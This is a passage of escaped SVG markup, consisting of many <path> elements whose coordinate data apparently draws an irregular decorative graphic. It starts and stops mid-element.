d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path 